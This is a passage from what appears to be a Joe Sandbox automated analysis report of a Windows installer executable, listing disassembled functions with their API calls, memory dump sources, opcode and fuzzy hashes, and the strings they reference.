                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 00405FB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: 4ou$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        • API String ID: 3248276644-44708928
                                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                        • Instruction ID: 6a7a19aedd3560da6e477bd72522a8c235124595f9c35bb96c459409ca5d5c37
                                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                        • Instruction Fuzzy Hash: 28F0F42A105E6369C622333A5C05AAF1954CE86324B5A453FBC91F22C5CF3C8A42CDBE
                                                        Function 73B01979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FreeGlobal
                                                        • String ID:
                                                        • API String ID: 2979337801-0
                                                        • Opcode ID: 17cc290bfc7daee4a97d9f56303a64d15ab38b1c41cf57a17b7758b6ebd01c3f
                                                        • Instruction ID: ae383de39c2ddf217f3aebf65d6aa6b561e3a58ed3b1dd9c04db493191ebb3ef
                                                        • Opcode Fuzzy Hash: 17cc290bfc7daee4a97d9f56303a64d15ab38b1c41cf57a17b7758b6ebd01c3f
                                                        • Instruction Fuzzy Hash: 3D51F67ED00118ABEB1E9FA4C5407AE7FBAFBC4344F04817AD506B3290F771AA458791
                                                        Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                        • GetClientRect.USER32(?,?), ref: 00401E0A
                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                        • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                        • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                        • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                        • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                        Function 73B016BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73B022D8,?,00000808), ref: 73B016D5
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73B022D8,?,00000808), ref: 73B016DC
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73B022D8,?,00000808), ref: 73B016F0
                                                        • GetProcAddress.KERNEL32(73B022D8,00000000), ref: 73B016F7
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B01700
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                        • String ID:
                                                        • API String ID: 1148316912-0
                                                        • Opcode ID: 135bacea1ac9a883109723458246a3c2b66d5e29a96c556a3b0d13e8614fea39
                                                        • Instruction ID: efa817c108a7a15fbb93065af3af4ebe1fd5a9834649f6e624332ca0e8961256
                                                        • Opcode Fuzzy Hash: 135bacea1ac9a883109723458246a3c2b66d5e29a96c556a3b0d13e8614fea39
                                                        • Instruction Fuzzy Hash: 04F012731061387BD63026A79D4CD9B7E9CDF9B2F9B110215F71CA21A095614C01DBF1
                                                        Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                        • Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
                                                        • Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                        • Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
                                                        Function 00404DA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                        • wsprintfW.USER32 ref: 00404E4D
                                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                        • Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
                                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                        • Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
                                                        Function 00405EF1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                        • CharNextW.USER32(00000000), ref: 00405F04
                                                        • CharNextW.USER32(00000000), ref: 00405F1C
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsj924C.tmp, xrefs: 00405EF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        • API String ID: 3213498283-1453126546
                                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                        • Instruction ID: 0a1f1b5a9c7109d9782da40e5c64a20d368bd089a9add51530d5bf68f03dfa04
                                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                        • Instruction Fuzzy Hash: 98F09062D00A2795DA31B7645C85A7766BCEB593A0B00807BE601B72C0D7BC48818EDA
                                                        Function 00405E46 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E4C
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040353F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405E56
                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E68
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-1881609536
                                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction ID: f2f0f64a112d89f35c11d852d44423d34ca235ab8761dbed5ccf1744ff487032
                                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction Fuzzy Hash: C2D05E31101534AAC6116F54AD04DDB62AC9E46384381483BF541B20A5C778595186FD
                                                        Function 73B010E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73B01171
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 73B011E3
                                                        • GlobalFree.KERNEL32 ref: 73B0124A
                                                        • GlobalFree.KERNEL32(?), ref: 73B0129B
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B012B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: f6a3bddd22c0bbebc8df5864dd03b1bd1767cce3603f019ce7195db68a8f801b
                                                        • Instruction ID: 61a6eae1d9ecbcdbe176116bf81c7083dba21d72eeb5fe803d49bd01190666b1
                                                        • Opcode Fuzzy Hash: f6a3bddd22c0bbebc8df5864dd03b1bd1767cce3603f019ce7195db68a8f801b
                                                        • Instruction Fuzzy Hash: B55171FA9043059FE719DF65CA84B1A7BB8FB94318B144126F94ADBA50F734E910CF50
                                                        Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 004026BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp$C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll
                                                        • API String ID: 1659193697-1588490679
                                                        • Opcode ID: 16bcd07f8b696e8d4d77bdf42abac6a8be44450ddb0260aebc576801c6c870aa
                                                        • Instruction ID: 2d8dd356423beb748054ff885628a6ea3dfbd93006732d19d47d72bde2aed11d
                                                        • Opcode Fuzzy Hash: 16bcd07f8b696e8d4d77bdf42abac6a8be44450ddb0260aebc576801c6c870aa
                                                        • Instruction Fuzzy Hash: 3C11EB71A00315ABCB106FB19E466AE7761AF40748F21443FF502B71C1EAFD8891676E
                                                        Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                        • GetTickCount.KERNEL32 ref: 0040306F
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                        • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                        • Instruction ID: e0f0fd039426b51c9db09d8e0aed7b7b9f53d87474512ec8403aba9b2c913b41
                                                        • Opcode Fuzzy Hash: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                        • Instruction Fuzzy Hash: 93F05470602A21ABC6216F50FE09A9B7B69FB45B12B41043AF545B11ACCB384891CB9D
                                                        Function 00405570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040559F
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                          • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                        • Instruction ID: f144bc20a23b2fc1dad06cc698734642626ca736bc3518a3bbd7873959a32aa8
                                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                        • Instruction Fuzzy Hash: 21017171100608BBDF219F11DD84A9F376BEB84794F204037FA027A1D9C7398D529A69
                                                        Function 00403BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,756F3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B8C,00403AA2,?,?,00000008,0000000A,0000000C), ref: 00403BCE
                                                        • GlobalFree.KERNEL32(005993D0), ref: 00403BD5
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403BB4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 1100898210-1881609536
                                                        • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                        • Instruction ID: 378dd3650374f781d23bf779db5809bbac3881e8a2166d277484928c36cee721
                                                        • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                        • Instruction Fuzzy Hash: 20E08C336204205BC6311F15AE05B1A77786F89B2AF01402AE8407B2628BB47C528FC8
                                                        Function 00405E92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 00405E98
